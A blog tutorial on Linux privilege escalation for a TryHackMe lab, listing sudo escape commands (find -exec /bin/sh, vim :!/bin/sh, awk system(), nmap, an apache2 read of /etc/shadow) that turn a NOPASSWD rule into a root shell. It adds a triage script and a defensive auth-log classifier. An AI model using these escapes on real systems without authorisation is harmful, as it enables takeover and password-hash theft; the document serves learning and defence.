PRIVILEGE ESCALATION SERIES 2 CTF
WELCOME TO TAMILCODE
HERE ARE TRICKS AND TECHNOLOGY
In this post we look at privilege escalation through sudo binary abuse: what sudo is, and how a low-privileged user can become root on a Linux machine (TryHackMe). Let's get started.
So first, what is sudo?
Sudo stands for "superuser do". It lets a permitted user run a command as another user, normally root, according to the rules in /etc/sudoers.
Linux separates privileges between ordinary users and root.
A normal user has only low privileges; root has full control of the system.
A sudoers rule can also be tagged NOPASSWD, in which case the user runs the listed command through sudo without entering a password at all. That is the configuration we abuse below.
sudoers syntax
root ALL=(ALL:ALL) ALL
The fields are: the user the rule applies to (root), the hosts it applies to (ALL), the user and group the command may be run as (ALL:ALL, in parentheses), and the commands allowed (ALL). A NOPASSWD tag, when present, goes in front of the command list. You can see an example in the image below.
Now we will abuse sudo binaries on a TryHackMe machine.
STEP 1: sudo -l
This lists the commands the current user is allowed to run through sudo, as shown in the image below.
Look for entries of the form (root) NOPASSWD: /path/to/binary. They run with root privileges, and no password is asked for.
That means you can run those binaries as root without knowing any password. Now we abuse them.
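As an added example (not code from the original post), the script below does STEP 1's triage automatically: it reads the output of sudo -l on standard input and prints every NOPASSWD entry whose binary is one of the shell-spawning programs covered on this page. The sample sudo -l output, the user lowpriv and the host target are constructed for the example.

```sh
#!/bin/sh
# Added example, not code from the original post.
# Triage "sudo -l" output: print NOPASSWD entries whose binary can spawn a
# shell (the programs abused in this post). Sample output below is constructed.

# Binaries from this post that give a root shell, or read root-only files,
# when they run under sudo.
SHELL_SPAWNERS="iftop find nano vim man awk less ftp nmap apache2 more"

# Constructed "sudo -l" output for a hypothetical user lowpriv on host target.
SAMPLE_SUDO_L='Matching Defaults entries for lowpriv on target:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User lowpriv may run the following commands on target:
    (ALL) NOPASSWD: /usr/bin/find, /usr/bin/less
    (root) NOPASSWD: /usr/sbin/iftop
    (root) /usr/bin/apt'

# is_shell_spawner NAME: succeed if NAME is in SHELL_SPAWNERS.
is_shell_spawner() {
    for s in $SHELL_SPAWNERS; do
        [ "$1" = "$s" ] && return 0
    done
    return 1
}

# flag_nopasswd: read "sudo -l" output on stdin, print "<runas> <command>"
# for each NOPASSWD command whose basename is a shell spawner. Entries that
# still ask for a password are skipped; they only matter if you know it.
flag_nopasswd() {
    while IFS= read -r line; do
        case "$line" in
            *NOPASSWD:*)
                # "(ALL)" or "(root : root)" at the start of the line
                runas=$(printf '%s\n' "$line" | sed -n 's/^[[:space:]]*(\([^)]*\)).*/\1/p')
                # everything after the tag is a comma-separated command list
                cmds=${line#*NOPASSWD:}
                printf '%s\n' "$cmds" | tr ',' '\n' | while IFS= read -r cmd; do
                    # trim leading spaces, drop any fixed arguments
                    cmd=$(printf '%s\n' "$cmd" | sed 's/^[[:space:]]*//; s/[[:space:]].*//')
                    [ -n "$cmd" ] || continue
                    if is_shell_spawner "${cmd##*/}"; then
                        printf '%s %s\n' "$runas" "$cmd"
                    fi
                done
                ;;
        esac
    done
    return 0
}

# Stand-alone run against the constructed sample. On a real box, pipe the live
# output instead:  sudo -l | flag_nopasswd
printf '%s\n' "$SAMPLE_SUDO_L" | flag_nopasswd
```

For the sample above the script prints the find, less and iftop entries and skips apt, because apt still prompts for a password. The list of spawners is deliberately limited to the binaries discussed on this page; extend SHELL_SPAWNERS with whatever else your sudo -l shows.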
Note: what follows only shows how to go from a low-privileged user to root once such a sudo rule exists; it is not a full walkthrough of any TryHackMe machine.
So, first iftop.
TIP: before abusing a binary, understand what it does. That tells you where it lets you run commands.
Now, what is iftop?
Iftop is a bandwidth monitor: it shows network usage per connection on an interface. You quit it with q. Because it captures packets, it normally has to run as root, which is why administrators tend to grant it through sudo.
STEP 2: sudo /usr/sbin/iftop
You are now inside iftop. Press ! and a command prompt appears at the top of the screen, where you can run a shell command.
STEP 3: /bin/sh or /bin/bash
Now you have a root shell.
Next we abuse the find command.
What is find?
find is the Linux command for searching for files and directories. Its -exec option runs a command for every match, and that is what we abuse.
STEP 4: sudo find . -name tools -exec whoami \;
This prints root once for each file or directory named tools under the current directory (if nothing matches, -exec never runs and nothing is printed).
STEP 5: sudo find . -name tools -exec /bin/sh \;
Now you have a root shell.
You can get a bash shell instead with the command below.
STEP 6: sudo find . -name tools -exec /bin/bash \;
Now you have a root bash shell.
Next we abuse nano.
What is nano?
Nano is a beginner-friendly text editor that can edit any file on the Linux system. Now we abuse the nano editor.
STEP 7: sudo nano
When the editor opens, press Ctrl+R (read file) and then Ctrl+X (execute command); a "Command to execute" prompt appears, as shown in the image below.
STEP 8: reset; /bin/sh 1>&0 2>&0
After the command runs you get a root shell. The leading reset, and the redirection of stdout and stderr back to the terminal, are what make the shell usable from inside nano.
Next we abuse vim.
What is vim?
Vim is a text editor too, but it is less beginner-friendly than nano. Like nano, it can run shell commands from inside the editor.
STEP 9: sudo /usr/bin/vim
You are now inside the editor.
STEP 10: :!/bin/sh
Now you have a root shell.
Next we abuse the man command.
What is man?
Man displays the manual page of a command. It hands the page to a pager (normally less), and that pager can run shell commands.
STEP 11: sudo /usr/bin/man whoami
You get the manual page of whoami. Inside it, type the command below to abuse it.
STEP 12: !/bin/sh or !/bin/bash
Now you have a root shell.
Next we abuse the awk command.
What is awk?
Awk is a text-processing programming language, and its system() function runs a shell command.
STEP 13: sudo /usr/bin/awk 'BEGIN {system("/bin/sh")}'
Now you have a root shell through awk.
Next we abuse the less command.
Less is a pager, not an editor: it shows a file one screen at a time, and ! runs a shell command from inside it.
STEP 14: sudo /usr/bin/less /etc/profile
less needs a file to open, so any readable file will do. Now less is open.
STEP 15: !/bin/sh or !/bin/bash
Now you have a root shell.
Next we abuse ftp.
What is FTP?
ftp is the command-line client for the File Transfer Protocol, used to move files to and from an FTP server. Its interactive prompt accepts ! to run a local shell command.
STEP 16: sudo ftp
STEP 17: !/bin/sh or !/bin/bash
Now you have a root shell.
Next we abuse nmap.
What is nmap?
nmap is a port scanner, used to find open ports, running services and so on.
STEP 18: sudo nmap --interactive
STEP 19: !/bin/sh or !/bin/bash
Now you have a root shell. Note that --interactive only exists in old nmap releases (it was removed in 5.21). On a current nmap the same sudo rule is abused through an NSE script instead: write os.execute("/bin/sh") into a file and run sudo nmap --script=<that file>.
Next we abuse apache2.
What is apache2?
apache2 is the Apache web server; you can use it to host a website locally.
STEP 20: sudo /usr/sbin/apache2 -f /etc/shadow
apache2 tries to parse /etc/shadow as its configuration file and fails, and the syntax error it prints quotes the offending line, which is the first line of the file. That gives you root's password hash to crack offline. This is a one-line file read, not a shell, so it only leaks the first line of whatever file you point it at.
Next we abuse the more command.
more is a pager like less. It needs a file longer than the screen; otherwise it prints the file and exits before you can type anything.
STEP 21: sudo /bin/more /etc/passwd
STEP 22: !/bin/sh or !/bin/bash
Now you have a root shell.
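On the defensive side, as an added example that is not part of the original post: sudo writes every invocation to the auth log with the invoking user, the target user and the command, so the one-shot payloads above (find -exec /bin/sh, awk system(...)) are visible there. The interactive escapes (vim :!, less and more !, nano Ctrl+X, the ! prompts of iftop, ftp, man and nmap) are not: sudo logs only the editor or pager itself, and the shell it spawns is a child process sudo never sees. The script below classifies log lines accordingly. The log lines, the user lowpriv and the host target are constructed for the example, not captured from a real system.

```sh
#!/bin/sh
# Added example, not code from the original post.
# Classify sudo entries in an auth log against the binaries abused above.
# The log lines below are constructed for the example, not captured.

SAMPLE_AUTH_LOG='Mar  3 10:12:01 target sudo:  lowpriv : TTY=pts/0 ; PWD=/home/lowpriv ; USER=root ; COMMAND=/usr/bin/find . -name tools -exec /bin/sh \;
Mar  3 10:13:22 target sudo:  lowpriv : TTY=pts/0 ; PWD=/home/lowpriv ; USER=root ; COMMAND=/usr/bin/awk BEGIN {system("/bin/sh")}
Mar  3 10:14:05 target sudo:  lowpriv : TTY=pts/0 ; PWD=/home/lowpriv ; USER=root ; COMMAND=/usr/bin/vim
Mar  3 10:15:40 target sudo:  admin : TTY=pts/1 ; PWD=/home/admin ; USER=root ; COMMAND=/usr/bin/apt update
Mar  3 10:16:09 target sshd[1234]: Accepted publickey for admin from 10.10.10.5 port 51234 ssh2'

# classify_sudo: read syslog lines on stdin; for each sudo COMMAND line print
# "<verdict> <user> <command>". Verdicts:
#   SHELL   the logged command itself runs a shell (find -exec, awk system())
#   ESCAPE  an interactive program from this post whose ! or :! escape sudo
#           cannot log, so the line alone is only a lead
#   OK      anything else
classify_sudo() {
    while IFS= read -r line; do
        case "$line" in
            *' sudo: '*' COMMAND='*) ;;
            *) continue ;;
        esac
        # the invoking user sits between "sudo:" and " : TTY="
        user=$(printf '%s\n' "$line" | sed -n 's/.* sudo: *\([^ ]*\) : .*/\1/p')
        cmd=${line#*COMMAND=}
        bin=${cmd%% *}      # first word: the binary path
        bin=${bin##*/}      # its basename
        verdict=OK
        case "$cmd" in
            *'/bin/sh'*|*'/bin/bash'*|*'system('*) verdict=SHELL ;;
        esac
        if [ "$verdict" = OK ]; then
            case "$bin" in
                iftop|nano|vim|man|less|more|ftp|nmap) verdict=ESCAPE ;;
            esac
        fi
        printf '%s %s %s\n' "$verdict" "$user" "$cmd"
    done
    return 0
}

# Stand-alone run against the constructed lines. On a real host:
#   grep ' sudo: ' /var/log/auth.log | classify_sudo
printf '%s\n' "$SAMPLE_AUTH_LOG" | classify_sudo
```

The ESCAPE verdict is the important caveat: a line saying lowpriv ran sudo vim tells you nothing about the :!/bin/sh typed afterwards. To see that child shell you need process-level telemetry, for example an auditd execve rule, rather than the sudo log alone. The simplest fix is still the one the attack depends on: do not grant NOPASSWD sudo on editors, pagers or anything with a shell escape.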
I hope this article was useful. Please subscribe to the website and support us by donating through the link below.